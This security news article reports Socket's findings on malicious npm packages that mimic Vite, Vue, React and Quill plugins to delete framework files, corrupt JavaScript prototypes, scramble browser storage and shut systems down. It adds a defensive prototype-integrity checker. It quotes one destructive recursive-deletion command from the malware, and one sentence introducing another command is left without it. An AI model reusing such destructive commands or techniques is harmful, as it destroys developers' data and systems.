
In a disturbing development for the JavaScript community, Socket’s Threat Research Team has uncovered a stealthy and destructive supply chain attack campaign in the npm ecosystem. Malicious packages masquerading as legitimate tools have been actively targeting widely used frameworks such as React, Vue.js, Vite, and the Quill Editor, embedding code designed to corrupt data, destroy files, and even shut down systems.
“These malicious packages have remained undetected in the npm ecosystem for more than two years, accumulating over 6,200 downloads,” Socket researchers report.
The threat actor, operating under the npm alias xuxingfeng and using the email address 1634389031@qq[.]com, published eight destructive packages while simultaneously maintaining a portfolio of legitimate ones. This blend of good and bad packages creates a deceptive trust profile — a classic case of dual-use publishing.
“This mixed publishing approach helps mask malicious intent by establishing credibility and trust within the ecosystem.”
The malicious packages use typosquatting and name mimicry to lure developers. Examples include:
- vite-plugin-react-extend (vs. @vitejs/plugin-react)
- vite-plugin-vue-extend (vs. @vitejs/plugin-vue)
- vite-plugin-bomb (vs. vite-plugin-html)
- quill-image-downloader (similar to legitimate Quill plugins)
By adopting these misleading names, the attacker successfully inserted malware into critical development pipelines.
These packages delete core files from popular JavaScript frameworks. For instance, vite-plugin-bomb and vite-plugin-react-extend launch recursive deletion attacks against React, Vite, and Vue.js.
“process.execSync(rimraf ${node_modules}vue\\dist);” — destructive code embedded in the plugin.
The vite-plugin-vue-extend module even deploys a seven-stage attack, systematically targeting 19 essential libraries in the Vue ecosystem over a six-week timeline using randomized intervals.
The js-hood package subtly corrupts JavaScript’s core functionality. It overrides critical methods like Array.prototype.filter, String.prototype.split, and more, replacing expected results with random characters.
“This package is particularly dangerous because it directly attacks core JavaScript prototype methods… ensuring corrupted and unpredictable outputs.”
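As an added example, not code from the Socket report or from the packages it describes, here is a startup integrity check a defender could run to detect the kind of prototype tampering described above; it assumes Node.js, and the method list and the pass-through wrapper in demo() are constructed for the demonstration:

```javascript
// Added example (not the report's or the packages' code); Node.js assumed.
// Capture Function.prototype.toString before any dependency loads; the source
// check below is only as trustworthy as this reference.
const nativeToString = Function.prototype.toString;
const PROTECTED = [
  { label: 'Array.prototype.filter', owner: Array.prototype,  name: 'filter' },
  { label: 'Array.prototype.map',    owner: Array.prototype,  name: 'map' },
  { label: 'String.prototype.split', owner: String.prototype, name: 'split' },
];
// Record the original function references at startup, before third-party code runs.
function snapshot() {
  return PROTECTED.map(p => ({ ...p, fn: p.owner[p.name] }));
}

// Compare live prototypes against the snapshot: identity (property no longer points
// at the saved function) and source (toString no longer reports "[native code]").
function checkIntegrity(baseline) {
  const findings = [];
  for (const entry of baseline) {
    const live = entry.owner[entry.name];
    const reasons = [];
    if (live !== entry.fn) reasons.push('reference replaced');
    if (typeof live !== 'function' || !nativeToString.call(live).includes('[native code]')) {
      reasons.push('non-native implementation');
    }
    if (reasons.length) findings.push({ method: entry.label, reasons });
  }
  return findings;
}

// Hardening: pin each method so later assignments are ignored (sloppy mode) or
// throw (strict mode). Run after your own polyfills, before dependencies load.
function lockDown(baseline) {
  for (const entry of baseline) {
    Object.defineProperty(entry.owner, entry.name,
      { value: entry.fn, writable: false, configurable: false });
  }
}

// Constructed demonstration: a harmless pass-through wrapper stands in for the
// reported override so the check has something to flag; it is restored afterwards.
function demo() {
  const baseline = snapshot();
  const before = checkIntegrity(baseline);
  const original = Array.prototype.filter;
  Array.prototype.filter = function (...args) { return original.apply(this, args); };
  const after = checkIntegrity(baseline);
  Array.prototype.filter = original;
  return { before, after };
}
```

Calling snapshot() at the very top of the application entry point, then checkIntegrity() after dependencies load, gives the baseline and the comparison this check relies on.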
quill-image-downloader executes a three-phase attack targeting localStorage, sessionStorage, and cookies, scrambling stored data used for user sessions, authentication, and UI state.
“Unlike other packages that cause immediate, obvious damage… this attack corrupts client-side data in a way that causes persistent, hard-to-diagnose application failures.”
The js-bomb and vue-plugin-bomb packages forcibly shut down systems and delete framework files using scheduled multi-phase payloads. One of the embedded commands reads:
These payloads run in rapid intervals, often every second, leaving administrators with mere seconds to react before system shutdowns and data destruction occur.
The attackers took care to ensure cross-platform compatibility, dynamic path resolution, error handling, and scheduled activation to avoid detection and delay analysis. Several packages included minified code and error-suppressing try/catch blocks, adding to their stealth.
“Once activated, the attacks execute at intervals ranging from aggressive 1-second loops to randomized 5-10 minute windows.”
As of this writing, the malicious packages are still live on the npm registry. Socket has petitioned for their removal but warns that installations may still exist in local or production environments.